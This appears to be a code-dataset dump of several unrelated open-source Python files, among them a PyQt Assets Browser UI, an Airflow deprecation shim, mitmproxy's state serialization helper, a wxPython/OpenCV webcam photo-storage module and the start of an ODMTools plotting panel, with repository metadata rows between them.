self.pushBtnNewAsset = QtWidgets.QPushButton(self.actionWidget)
self.pushBtnNewAsset.setObjectName("pushBtnNewAsset")
self.verticalLayout.addWidget(self.pushBtnNewAsset)
self.pushBtnNewAssetItem = QtWidgets.QPushButton(self.actionWidget)
self.pushBtnNewAssetItem.setObjectName("pushBtnNewAssetItem")
self.verticalLayout.addWidget(self.pushBtnNewAssetItem)
self.pushBtnManageFormat = QtWidgets.QPushButton(self.actionWidget)
self.pushBtnManageFormat.setObjectName("pushBtnManageFormat")
self.verticalLayout.addWidget(self.pushBtnManageFormat)
self.debugCheckBox = QtWidgets.QCheckBox(self.actionWidget)
self.debugCheckBox.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.debugCheckBox.sizePolicy().hasHeightForWidth())
self.debugCheckBox.setSizePolicy(sizePolicy)
self.debugCheckBox.setObjectName("debugCheckBox")
self.verticalLayout.addWidget(self.debugCheckBox)
self.textEdit = QtWidgets.QTextEdit(self.actionWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(1)
sizePolicy.setHeightForWidth(self.textEdit.sizePolicy().hasHeightForWidth())
self.textEdit.setSizePolicy(sizePolicy)
self.textEdit.setObjectName("textEdit")
self.verticalLayout.addWidget(self.textEdit)
spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.MinimumExpanding)
self.verticalLayout.addItem(spacerItem)
self.labelCredits = QtWidgets.QLabel(self.actionWidget)
self.labelCredits.setTextFormat(QtCore.Qt.AutoText)
self.labelCredits.setOpenExternalLinks(True)
self.labelCredits.setObjectName("labelCredits")
self.verticalLayout.addWidget(self.labelCredits)
self.labelCredits.raise_()
self.debugCheckBox.raise_()
self.pushBtnNewAsset.raise_()
self.labelProject.raise_()
self.textEdit.raise_()
self.projectComboBox.raise_()
self.pushBtnNewAssetItem.raise_()
self.pushBtnManageFormat.raise_()
self.tabWidget = QtWidgets.QTabWidget(self.splitter)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.tabWidget.sizePolicy().hasHeightForWidth())
self.tabWidget.setSizePolicy(sizePolicy)
self.tabWidget.setObjectName("tabWidget")
self.tabHelp = QtWidgets.QWidget()
self.tabHelp.setObjectName("tabHelp")
self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.tabHelp)
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.frameHelp = QtWidgets.QFrame(self.tabHelp)
self.frameHelp.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frameHelp.setFrameShadow(QtWidgets.QFrame.Sunken)
self.frameHelp.setObjectName("frameHelp")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.frameHelp)
self.horizontalLayout.setObjectName("horizontalLayout")
self.textBrowserHelp = QtWidgets.QTextBrowser(self.frameHelp)
self.textBrowserHelp.setOpenExternalLinks(True)
self.textBrowserHelp.setObjectName("textBrowserHelp")
self.horizontalLayout.addWidget(self.textBrowserHelp)
self.horizontalLayout_3.addWidget(self.frameHelp)
self.tabWidget.addTab(self.tabHelp, "")
self.gridLayout.addWidget(self.splitter, 0, 0, 1, 1)
MainWindow.setCentralWidget(self.centralWidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 851, 21))
self.menubar.setObjectName("menubar")
self.menuFile = QtWidgets.QMenu(self.menubar)
self.menuFile.setObjectName("menuFile")
self.menuView = QtWidgets.QMenu(self.menubar)
self.menuView.setObjectName("menuView")
self.menuHelp = QtWidgets.QMenu(self.menubar)
self.menuHelp.setObjectName("menuHelp")
self.menuSettings = QtWidgets.QMenu(self.menubar)
self.menuSettings.setObjectName("menuSettings")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setEnabled(True)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.actionQuit = QtWidgets.QAction(MainWindow)
self.actionQuit.setObjectName("actionQuit")
self.actionAbout = QtWidgets.QAction(MainWindow)
self.actionAbout.setObjectName("actionAbout")
self.actionAlwaysOnTop = QtWidgets.QAction(MainWindow)
self.actionAlwaysOnTop.setCheckable(True)
self.actionAlwaysOnTop.setObjectName("actionAlwaysOnTop")
self.actionPreferences = QtWidgets.QAction(MainWindow)
self.actionPreferences.setObjectName("actionPreferences")
self.actionNewAsset = QtWidgets.QAction(MainWindow)
self.actionNewAsset.setObjectName("actionNewAsset")
self.actionNewAssetItem = QtWidgets.QAction(MainWindow)
self.actionNewAssetItem.setObjectName("actionNewAssetItem")
self.actionApplicationsList = QtWidgets.QAction(MainWindow)
self.actionApplicationsList.setObjectName("actionApplicationsList")
self.actionManageFormat = QtWidgets.QAction(MainWindow)
self.actionManageFormat.setObjectName("actionManageFormat")
self.menuFile.addAction(self.actionNewAsset)
self.menuFile.addAction(self.actionNewAssetItem)
self.menuFile.addAction(self.actionManageFormat)
self.menuFile.addSeparator()
self.menuFile.addAction(self.actionQuit)
self.menuView.addAction(self.actionAlwaysOnTop)
self.menuHelp.addAction(self.actionAbout)
self.menuSettings.addAction(self.actionPreferences)
self.menuSettings.addAction(self.actionApplicationsList)
self.menubar.addAction(self.menuFile.menuAction())
self.menubar.addAction(self.menuView.menuAction())
self.menubar.addAction(self.menuSettings.menuAction())
self.menubar.addAction(self.menuHelp.menuAction())
self.retranslateUi(MainWindow)
self.tabWidget.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "Assets Browser"))
self.labelProject.setText(_translate("MainWindow", "Project:"))
self.pushBtnNewAsset.setText(_translate("MainWindow", "Create New Asset"))
self.pushBtnNewAssetItem.setText(_translate("MainWindow", "Create New Asset Item"))
self.pushBtnManageFormat.setText(_translate("MainWindow", "Manage Asset Item Format"))
self.debugCheckBox.setText(_translate("MainWindow", "Show Debug Panel"))
self.labelCredits.setText(_translate("MainWindow", "<html><head/><body><p>Huey Yeng © 2017-2021</p><p><a href=\"https://taukeke.com\"><span style=\" text-decoration: underline; color:#0000ff;\">taukeke.com<br/></span></a><a href=\"https://github.com/hueyyeng/AssetsBrowser\"><span style=\" text-decoration: underline; color:#0000ff;\">Assets Browser@ GitHub</span></a></p></body></html>"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tabHelp), _translate("MainWindow", "Help"))
self.menuFile.setTitle(_translate("MainWindow", "&File"))
self.menuView.setTitle(_translate("MainWindow", "&View"))
self.menuHelp.setTitle(_translate("MainWindow", "&Help"))
self.menuSettings.setTitle(_translate("MainWindow", "&Settings"))
self.actionQuit.setText(_translate("MainWindow", "&Quit"))
self.actionAbout.setText(_translate("MainWindow", "&About Assets Browser"))
self.actionAlwaysOnTop.setText(_translate("MainWindow", "Always on &Top"))
self.actionPreferences.setText(_translate("MainWindow", "&Preferences..."))
self.actionNewAsset.setText(_translate("MainWindow", "&New Asset"))
self.actionNewAssetItem.setText(_translate("MainWindow", "New &Asset Item"))
self.actionApplicationsList.setText(_translate("MainWindow", "&Applications List..."))
self.actionManageFormat.setText(_translate("MainWindow", "&Manage Asset Item Format"))
| mit | -3,948,126,092,516,333,000 | 58.136585 | 398 | 0.73043 | false |
nathanielvarona/airflow | airflow/contrib/operators/gcp_video_intelligence_operator.py | 1 | 1369 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
This module is deprecated.
Please use :mod:`airflow.providers.google.cloud.operators.video_intelligence`.
"""
import warnings
# pylint: disable=unused-import
from airflow.providers.google.cloud.operators.video_intelligence import ( # noqa
CloudVideoIntelligenceDetectVideoExplicitContentOperator,
CloudVideoIntelligenceDetectVideoLabelsOperator,
CloudVideoIntelligenceDetectVideoShotsOperator,
)
warnings.warn(
"This module is deprecated. Please use `airflow.providers.google.cloud.operators.video_intelligence`",
DeprecationWarning,
stacklevel=2,
)
| apache-2.0 | 2,743,764,292,504,711,700 | 37.027778 | 106 | 0.784514 | false |
vhaupert/mitmproxy | mitmproxy/stateobject.py | 1 | 3417 | import json
import typing
from mitmproxy.coretypes import serializable
from mitmproxy.utils import typecheck
class StateObject(serializable.Serializable):
"""
An object with serializable state.
State attributes can either be serializable types(str, tuple, bool, ...)
or StateObject instances themselves.
"""
_stateobject_attributes: typing.ClassVar[typing.MutableMapping[str, typing.Any]]
"""
An attribute-name -> class-or-type dict containing all attributes that
should be serialized. If the attribute is a class, it must implement the
Serializable protocol.
"""
def get_state(self):
"""
Retrieve object state.
"""
state = {}
for attr, cls in self._stateobject_attributes.items():
val = getattr(self, attr)
state[attr] = get_state(cls, val)
return state
def set_state(self, state):
"""
Load object state from data returned by a get_state call.
"""
state = state.copy()
for attr, cls in self._stateobject_attributes.items():
val = state.pop(attr)
if val is None:
setattr(self, attr, val)
else:
curr = getattr(self, attr, None)
if hasattr(curr, "set_state"):
curr.set_state(val)
else:
setattr(self, attr, make_object(cls, val))
if state:
raise RuntimeWarning("Unexpected State in __setstate__: {}".format(state))
def _process(typeinfo: typecheck.Type, val: typing.Any, make: bool) -> typing.Any:
if val is None:
return None
elif make and hasattr(typeinfo, "from_state"):
return typeinfo.from_state(val)
elif not make and hasattr(val, "get_state"):
return val.get_state()
typename = str(typeinfo)
if typename.startswith("typing.List"):
T = typecheck.sequence_type(typeinfo)
return [_process(T, x, make) for x in val]
elif typename.startswith("typing.Tuple"):
Ts = typecheck.tuple_types(typeinfo)
if len(Ts) != len(val):
raise ValueError("Invalid data. Expected {}, got {}.".format(Ts, val))
return tuple(
_process(T, x, make) for T, x in zip(Ts, val)
)
elif typename.startswith("typing.Dict"):
k_cls, v_cls = typecheck.mapping_types(typeinfo)
return {
_process(k_cls, k, make): _process(v_cls, v, make)
for k, v in val.items()
}
elif typename.startswith("typing.Any"):
# This requires a bit of explanation. We can't import our IO layer here,
# because it causes a circular import. Rather than restructuring the
# code for this, we use JSON serialization, which has similar primitive
# type restrictions as tnetstring, to check for conformance.
try:
json.dumps(val)
except TypeError:
raise ValueError(f"Data not serializable: {val}")
return val
else:
return typeinfo(val)
def make_object(typeinfo: typecheck.Type, val: typing.Any) -> typing.Any:
"""Create an object based on the state given in val."""
return _process(typeinfo, val, True)
def get_state(typeinfo: typecheck.Type, val: typing.Any) -> typing.Any:
"""Get the state of the object given as val."""
return _process(typeinfo, val, False)
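# Illustrative sketch (not part of mitmproxy): a minimal StateObject subclass.
# The Flight class and its attributes are invented for this example only.
#
#   class Flight(StateObject):
#       _stateobject_attributes = dict(number=int, origin=str)
#
#       def __init__(self, number=0, origin=""):
#           self.number = number
#           self.origin = origin
#
#       @classmethod
#       def from_state(cls, state):
#           flight = cls()
#           flight.set_state(state)
#           return flight
#
#   f = Flight(42, "AMS")
#   state = f.get_state()          # {'number': 42, 'origin': 'AMS'}
#   g = Flight.from_state(state)   # round-trips through the serialized state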
| mit | 1,843,769,143,436,569,600 | 33.515152 | 86 | 0.60755 | false |
rechner/Taxidi | webcam.py | 1 | 18402 | #!/usr/bin/env python
#-*- coding:utf-8 -*-
#TODO: Update for use with new API
#TODO: Read config, optionally disable rectangle.
#TODO: Create Destroy() method
#TODO: Implement file system organization, handle converting & uploading image to server.
#TODO: Use gstreamer for Linux instead of opencv - better performance(?)
#This is needed for PIL to import in OS X (FIXME)
import sys
sys.path.append('/opt/local/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/site-packages')
import os
import wx
import wx.lib.imagebrowser as ib
import logging
import conf
from itertools import *
from operator import itemgetter
from PIL import Image
if conf.as_bool(conf.config['webcam']['enable']):
import opencv
from opencv import cv, highgui
class LivePanel(wx.Panel):
"""
    Creates a wxPanel for capturing from a USB webcam with OpenCV, meaning
    this works with all platforms OpenCV works with (Linux, OS X, Windows).
    Initialize just like a wx.Panel, optionally specifying a camera index, starting
    from 0. The default of -1 will automatically select the first usable device.
"""
def __init__(self, parent, id, camera=-1):
wx.Panel.__init__(self, parent, id, style=wx.NO_BORDER)
self.camera = camera
self.cap = highgui.cvCreateCameraCapture(camera)
wximg = wx.Image('resources/icons/camera-error-128.png')
self.errorBitmap = wximg.ConvertToBitmap()
self._error = 0
self.store = Storage()
self.Bind(wx.EVT_IDLE, self.onIdle)
def onIdle(self, event):
"""
Event to grab and display a frame from the camera. (internal use).
"""
if self.cap == None: #Should be cvCameraCapture instance.
#unbind the idle instance, change to click.
highgui.cvReleaseCapture(self.cap) #release the old instance and
self.cap = highgui.cvCreateCameraCapture(self.camera) #try new one.
self.displayError(self.errorBitmap, (128, 128))
raise CameraError('Unable to open camera, retrying....')
event.Skip()
try:
img = highgui.cvQueryFrame(self.cap)
        except Exception as e:
raise CameraError('Error when querying for frame: {0}'.format(e))
self._error = 0 #worked successfully
img = opencv.cvGetMat(img)
cv.cvCvtColor(img, img, cv.CV_BGR2RGB)
if conf.as_bool(conf.config['webcam']['cropBars']):
#Draw cropping region
cv.cvRectangle(img, (80, -1), (560, 480), (205.0, 0.0, 0.0, 0.0), 2)
self.displayImage(img)
event.RequestMore()
def open(self, camera=-1):
"""
Open a capture device after __init__ has been called. Call close() first
before opening a new device. Takes camera index as an option.
"""
self.cap = highgui.cvCreateCameraCapture(camera)
self.Bind(wx.EVT_IDLE, self.onIdle)
pass
def close(self):
"""
        Close a capture device and stop writing frames to the screen.
"""
highgui.cvReleaseCapture(self.cap)
self.Unbind(wx.EVT_IDLE)
def suspend(self):
"""
        Suspend writing frames to the screen. Should be called when the widget is hidden
to prevent excessive CPU usage.
"""
self.Unbind(wx.EVT_IDLE)
def resume(self):
"""
Resume reading and outputting frames.
"""
self.Bind(wx.EVT_IDLE, self.onIdle)
def displayImage(self, img, offset=(0,0)):
"""
Internal function for writing a bitmap grabbed from OpenCV to the panel.
"""
bitmap = wx.BitmapFromBuffer(img.width, img.height, img.imageData)
dc = wx.ClientDC(self)
dc.DrawBitmap(bitmap, offset[0], offset[1], False)
def displayError(self, bitmap, offset=(0,0)):
"""
Shows an error message saying the video device was not found.
Accepts bitmap as wx.Bitmap and position. Optimized for 128x128.
"""
#FIXME: (Minor) a bit of flicker on the error message.
if self._error > 2: #Only redraw if needed.
self.Unbind(wx.EVT_IDLE)
self.Unbind(wx.EVT_LEFT_UP) #just in case
self.Bind(wx.EVT_LEFT_UP, self.onClick)
return 0
boldfont = wx.SystemSettings_GetFont(wx.SYS_DEFAULT_GUI_FONT)
boldfont.SetWeight(wx.BOLD)
boldfont.SetPointSize(16)
dc = wx.ClientDC(self)
dc.Clear()
pencolour = wx.Colour(180, 0, 0, wx.ALPHA_OPAQUE)
brushcolour = wx.Colour(180, 0, 0, wx.ALPHA_OPAQUE)
dc.SetPen(wx.Pen(pencolour))
dc.SetBrush(wx.Brush(brushcolour))
rect = wx.Rect(0,0, 450, 200)
rect.SetPosition((100, 100))
dc.DrawRoundedRectangleRect(rect, 8)
message = 'Unable to open video device.\nIs there one connected?\n\n' \
'Click here to retry.'
dc.SetTextForeground('white')
dc.DrawText(message, 280, 170)
dc.SetFont(boldfont)
dc.DrawText('Error', 280, 140)
dc.DrawBitmap(bitmap, offset[0], offset[1], False)
self._error += 1
def onClick(self, event):
        self._error = 1 #For some reason it'll disappear otherwise.
self.displayError(self.errorBitmap, (128, 128))
self.Unbind(wx.EVT_LEFT_UP)
self.open(self.camera)
def save(self, record=-1):
"""
        Captures, crops, and saves a webcam frame. Pass an explicit record number,
        otherwise the next record in sequence is used. Returns the zero-padded photo reference ID.
"""
img = highgui.cvQueryFrame(self.cap)
img = opencv.cvGetMat(img)
#No BGR => RGB conversion needed for PIL output.
pil = opencv.adaptors.Ipl2PIL(img) #convert to a PIL
#~ pil = pil.crop((80, 0, 560, 480))
#~ pil.show()
return self.store.savePIL(pil, record)
#~ try:
#~ pil.save(file)
#~ except KeyError:
#~ pil.save(file+'.jpg')
class Storage:
"""
Crops, resizes, stores, and retrieves images for the database.
"""
def __init__(self):
self.log = logging.getLogger(__name__)
#~ self.log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('[%(asctime)s] %(module)-6s [%(levelname)-8s] %(message)s')
ch.setFormatter(formatter)
self.log.addHandler(ch)
self.log.debug("Created webcam storage instance.")
store = conf.config['webcam']['store'].lower()
if store == 'local':
self.log.debug("Configured for local storage.")
self.store = 'local'
olddir = os.getcwd()
os.chdir(os.path.join(conf.homepath, '.taxidi'))
self.target = os.path.abspath(conf.config['webcam']['target'])
self.thumbs = os.path.abspath(conf.config['webcam']['thumbs'])
os.chdir(olddir) #Switch back to old cwd
#See if target directories exist, and create if needed.
for target in [self.target, self.thumbs]:
if not os.path.exists(target):
#Doesn't exist, try to create:
self.log.warn("Directory {0} doesn't exist. Attempting to create...".format(target))
try:
os.makedirs(target)
                except OSError as e:
self.log.error(e)
self.log.error("Directory already exists or permission denied when creating directory.")
raise
self.log.debug("Target: {0}".format(self.target))
self.log.debug("Thumbs: {0}".format(self.thumbs))
elif store == 'remote':
self.store = 'remote' #TODO remote storage (low priority)
def savePIL(self, image, record=-1):
"""
Saves an image in PIL format, cropping & resizing if needed, and creating
a thumbnail.
`image`: A valid PIL instance.
`record`: Explicit id (integer) to save the image to (as a reference).
All other values are determined from [webcam] section in config.
If record is -1, the id will be automatically determined by the first
available slot. Returns zero-padded ID as string.
"""
if ((image.size[0] != 640) and (image.size[1] != 480)) or \
((image.size[0] != 480) and (image.size[1] != 480)):
#Scale up/down:
print "Scale"
image.thumbnail((480, 480))
if image.size != (480, 480):
#Crop it down.
print "Crop"
image = image.crop((80, 0, 560, 480))
if record >= 0: #Explicit file
record = str(record).zfill(6)
else: #Determine automatically
record = str(self._getNextSlot()).zfill(6)
filename = os.path.join(self.target, record + '.jpg')
self.log.debug("Saving image as {0}...".format(filename))
try:
image.save(filename)
except:
self.log.error("Unable to save image!")
raise
#Create & save thumbnails:
image.thumbnail((128, 128))
filename = os.path.join(self.thumbs, record + '.jpg')
try:
image.save(filename)
except:
self.log.error("Unable to save image!")
raise
return record
def getThumbnail100(self, record):
"""
Returns a 100x100 wxBitmap given a record number.
"""
pil = Image.open(self.getThumbnailPath(record))
pil.thumbnail((100, 100))
image = wx.EmptyImage(*pil.size)
image.SetData(pil.convert("RGB").tostring())
return wx.BitmapFromImage(image)
def saveImage(self, filename, record=-1):
"""
Like savePIL(), but accepts local filename as argument instead.
Used for inserting a custom image into the photo database.
"""
try:
image = Image.open(filename)
except IOError as e:
self.log.error(e)
self.log.error('Unable to copy image.')
raise
#From a webcam most likely:
if image.size == (640, 480):
image = image.crop((80, 0, 560, 480))
#Scale to fit
image.thumbnail((480, 480), Image.ANTIALIAS)
if record >= 0: #Explicit file
record = str(record).zfill(6)
else: #Determine automatically
record = str(self._getNextSlot()).zfill(6)
filename = os.path.join(self.target, record + '.jpg')
self.log.debug("Saving image as {0}...".format(filename))
try:
image.save(filename)
except:
self.log.error("Unable to save image!")
raise
#Create & save thumbnails:
image.thumbnail((128, 128), Image.ANTIALIAS) #User higher quality for custom images
filename = os.path.join(self.thumbs, record + '.jpg')
try:
image.save(filename)
except:
self.log.error("Unable to save image!")
raise
return record
def delete(self, record):
try:
os.unlink(self.getImagePath(record))
os.unlink(self.getThumbnailPath(record))
except OSError as e:
self.log.error(e)
self.log.error("Unable to unlink files for photo record {0}".format(record))
def _getNextSlotAdvanced(self): #FIXME
files = []
ret = []
for dirname, dirnames, filenames in os.walk(self.target):
for name in filenames:
files.append(int(name.strip('.jpg')))
files.sort()
for k, g in groupby(enumerate(files), lambda (i, x): i - x):
ret.append(map(itemgetter(1), g))
return int(ret[1][-1]) + 1
def _getNextSlot(self):
files = []
for filename in os.listdir(self.target):
if filename.endswith('.jpg'):
files.append(int(filename.strip('.jpg')))
files.sort()
if len(files) == 0:
return 0
return int(files[-1]) + 1
def getImagePath(self, record):
"""
Returns the full file path for a photo record (local).
"""
try:
return os.path.join(self.target, str(int(record)).zfill(6) + '.jpg')
except ValueError:
return None
def getThumbnailPath(self, record):
"""
Returns full file path for a photo record thumbnail (local).
"""
return os.path.join(self.thumbs, str(int(record)).zfill(6) + '.jpg')
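# Illustrative usage sketch for Storage. It assumes the [webcam] 'target' and
# 'thumbs' directories are configured; the source file below is hypothetical.
#
#   store = Storage()
#   record = store.saveImage('/tmp/portrait.jpg')   # returns e.g. '000000'
#   full_path = store.getImagePath(record)          # <target>/000000.jpg
#   thumb_bitmap = store.getThumbnail100(record)    # 100x100 wx.Bitmap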
t_CONTROLS_SAVE = wx.NewEventType()
CONTROLS_SAVE = wx.PyEventBinder(t_CONTROLS_SAVE, 1)
t_CONTROLS_CANCEL = wx.NewEventType()
CONTROLS_CANCEL = wx.PyEventBinder(t_CONTROLS_CANCEL, 1)
t_CONTROLS_SELECT_FILE = wx.NewEventType()
CONTROLS_SELECT_FILE = wx.PyEventBinder(t_CONTROLS_SELECT_FILE, 1)
class Controls(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
# Controls
self.button_play = wx.Button(self, label="Take Picture", size=(140, 50))
self.button_cancel = wx.Button(self, label="Cancel", size=(140, 50))
self.button_file = wx.Button(self, label="Pick File...", size=(290, 30))
# Sizers
sizer = wx.BoxSizer(wx.HORIZONTAL)
sizer.Add(self.button_play, 0, wx.ALL, border=5)
sizer.Add(self.button_cancel, 0, wx.ALL, border=5)
bsizer = wx.BoxSizer(wx.VERTICAL)
bsizer.Add(sizer)
bsizer.Add(self.button_file, 0, wx.ALL, border=5)
csizer = wx.BoxSizer(wx.HORIZONTAL)
csizer.AddStretchSpacer()
csizer.Add(bsizer)
csizer.AddStretchSpacer()
self.SetSizer(csizer)
# Events
self.button_play.Bind(wx.EVT_BUTTON, self.Snapshot)
self.button_cancel.Bind(wx.EVT_BUTTON, self.OnCancel)
self.button_file.Bind(wx.EVT_BUTTON, self.OnFile)
def Snapshot(self, evt):
evt2 = wx.PyCommandEvent(t_CONTROLS_SAVE, self.GetId())
self.GetEventHandler().ProcessEvent(evt2)
evt.Skip()
def OnCancel(self, evt):
evt2 = wx.PyCommandEvent(t_CONTROLS_CANCEL, self.GetId())
self.GetEventHandler().ProcessEvent(evt2)
evt.Skip()
def OnFile(self, evt):
evt2 = wx.PyCommandEvent(t_CONTROLS_SELECT_FILE, self.GetId())
self.GetEventHandler().ProcessEvent(evt2)
evt.Skip()
class Panel(wx.Panel):
def __init__(self, parent):
"""
This is the master webcam capture panel.
"""
self.log = logging.getLogger(__name__)
wx.Panel.__init__(self, parent, style=wx.NO_BORDER)
self.log.debug('Created webcam capture panel.')
# Controls
device = int(conf.config['webcam']['device'])
self.log.debug('Using OpenCV device {0}'.format(device))
self.live = LivePanel(self, device)
self.controls = Controls(self)
# Sizer
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(self.live, 1, wx.RIGHT|wx.EXPAND, 4)
sizer.Add(self.controls, 0, wx.ALL|wx.EXPAND, 4)
self.SetSizer(sizer)
# Events
self.controls.Bind(CONTROLS_SAVE, self.OnSave)
self.controls.Bind(CONTROLS_CANCEL, self.OnStop)
self.controls.Bind(CONTROLS_SELECT_FILE, self.OnFile)
self.controls.SetBackgroundColour('#005889') #TODO: source colours from theme.
self.live.SetBackgroundColour('#005889')
self.SetBackgroundColour('#005889')
#Variables:
self.overwrite = None
#Storage instance:
self.PhotoStorage = Storage()
def OnSave(self, evt):
"""
Internal event for saving an image from the webcam.
Read the reference ID with GetFile().
"""
if self.overwrite != None:
self.fileSelection = self.live.save(self.overwrite)
else:
self.fileSelection = self.live.save()
self.overwrite = None
evt.Skip()
def SetOverwrite(self, record):
self.overwrite = record
def OnStop(self, evt):
"""
Hides the panel and suspends video input.
"""
self.log.debug('Hide & suspend webcam panel.')
self.Hide()
self.live.suspend()
evt.Skip()
def OnFile(self, evt):
"""
Internal event for the CONTROLS_SELECT_FILE event.
Read the selection with GetFile().
"""
self.live.suspend()
initial_dir = os.getcwd()
dlg = ib.ImageDialog(self, initial_dir)
dlg.Centre()
#TODO: Process file selection
if dlg.ShowModal() == wx.ID_OK:
# show the selected file
self.fileSelection = dlg.GetFile()
evt.Skip()
else:
self.fileSelection = None
dlg.Destroy()
self.live.resume()
def GetFile(self):
"""
Retrieve the file selected by the user after the
CONTROLS_SELECT_FILE event.
"""
return self.fileSelection
class CameraError(Exception):
def __init__(self, value=''):
if value == '':
self.error = 'Generic camera error.'
else:
self.error = value
def __str__(self):
return repr(self.error)
def getVideoDevices():
"""
Returns a list of available system video devices by name.
Pass index of this list to video capture class to use that device
(Linux only) or pass -1 to use the first available video device.
Note that this may have issues on some implementations of OpenCV.
"""
try:
import subprocess
devices = subprocess.check_output(
'for I in /sys/class/video4linux/*; do cat $I/name; done',
shell=True)
except AttributeError:
#Python < 2.7, use os.popen instead.
fdev = os.popen('for I in /sys/class/video4linux/*; do cat $I/name; done')
devices = fdev.read()
fdev.close()
    #Cast to a list and drop the trailing empty entry
devices = devices.split('\n')[:-1] #Remove trailing \n
return devices
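# Illustrative sketch pairing getVideoDevices() with LivePanel (Linux only;
# 'frame' is assumed to be an existing wx.Frame):
#
#   devices = getVideoDevices()   # e.g. ['UVC Camera (046d:0825)']
#   panel = LivePanel(frame, -1, camera=0 if devices else -1)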
if __name__ == '__main__':
import opencv
from opencv import cv, highgui
app = wx.PySimpleApp()
pFrame = wx.Frame(None, -1, "Webcam Viewer", size = (640, 560))
Panel(pFrame)
pFrame.Show()
app.MainLoop()
| gpl-3.0 | 3,329,031,220,949,620,700 | 32.641682 | 112 | 0.586349 | false |
ODM2/ODMToolsPython | odmtools/gui/pnlPlot.py | 1 | 7003 | #Boa:FramePanel:Panel1
import wx
from wx.lib.pubsub import pub as Publisher
try:
from agw import flatnotebook as fnb
except ImportError: # if it's not there locally, try the wxPython lib.
import wx.lib.agw.flatnotebook as fnb
import matplotlib
matplotlib.use('WXAgg')
import plotTimeSeries
import plotSummary
import plotHistogram
import plotBoxWhisker
import plotProbability
from odmtools.controller.logicPlotOptions import SeriesPlotInfo
import logging
# from odmtools.common.logger import LoggerTool
#
# tool = LoggerTool()
# logger = tool.setupLogger(__name__, __name__ + '.log', 'w', logging.DEBUG)
logger = logging.getLogger('main')
[wxID_PANEL1, wxID_PAGEBOX, wxID_PAGEHIST, wxID_PAGEPROB,
wxID_PAGESUMMARY, wxID_PAGETIMESERIES, wxID_TABPLOTS
] = [wx.NewId() for _init_ctrls in range(7)]
class pnlPlot(fnb.FlatNotebook):
def __init__(self, parent, taskserver):
self.taskserver = taskserver
self._init_ctrls(parent)
self.initPubSub()
self.parent = parent
def _init_ctrls(self, parent):
fnb.FlatNotebook.__init__(self, id=wxID_TABPLOTS, name=u'tabPlots',
parent=parent, pos=wx.Point(0, 0), size=wx.Size(491, 288),
agwStyle=fnb.FNB_NODRAG | fnb.FNB_HIDE_TABS)
# style |= fnb.FNB_HIDE_TABS
# self.book.SetAGWWindowStyleFlag(style)
self.pltTS = plotTimeSeries.plotTimeSeries(id=wxID_PAGETIMESERIES, name='pltTS',
parent=self, pos=wx.Point(0, 0), size=wx.Size(605, 458),
style=wx.TAB_TRAVERSAL)
self.AddPage(self.pltTS, 'TimeSeries')
self.pltProb = plotProbability.plotProb(id=wxID_PAGEPROB, name='pltProb',
parent=self, pos=wx.Point(0, 0), size=wx.Size(605, 458),
style=wx.TAB_TRAVERSAL)
        self.AddPage(self.pltProb, 'Probability')
self.pltHist = plotHistogram.plotHist(id=wxID_PAGEHIST, name='pltHist',
parent=self, pos=wx.Point(0, 0), size=wx.Size(605, 458),
style=wx.TAB_TRAVERSAL)
self.AddPage(self.pltHist, 'Histogram')
self.pltBox = plotBoxWhisker.PlotBox(id=wxID_PAGEBOX, name='pltBox',
parent=self, pos=wx.Point(0, 0), size=wx.Size(605, 458),
style=wx.TAB_TRAVERSAL)
self.AddPage(self.pltBox, 'Box/Whisker')
self.pltSum = plotSummary.plotSummary(id=wxID_PAGESUMMARY, name=u'pltSum',
parent=self, pos=wx.Point(784, 256), size=wx.Size(437, 477),
style=wx.TAB_TRAVERSAL)
self.AddPage(self.pltSum, 'Summary')
self._seriesPlotInfo = None
self.editID = None
self.legendVisible = False
def initPubSub(self):
Publisher.subscribe(self.onDateChanged, "onDateChanged")
Publisher.subscribe(self.onDateFull, "onDateFull")
Publisher.subscribe(self.onPlotType, "onPlotType")
Publisher.subscribe(self.onShowLegend, "onShowLegend")
Publisher.subscribe(self.onNumBins, "onNumBins")
Publisher.subscribe(self.onRemovePlot, "removePlot")
Publisher.subscribe(self.onRemovePlots, "removeMultPlot")
Publisher.subscribe(self.onChangeSelection, "changePlotSelection")
Publisher.subscribe(self.onUpdateValues, "updateValues")
Publisher.subscribe(self.clear, "clearPlot")
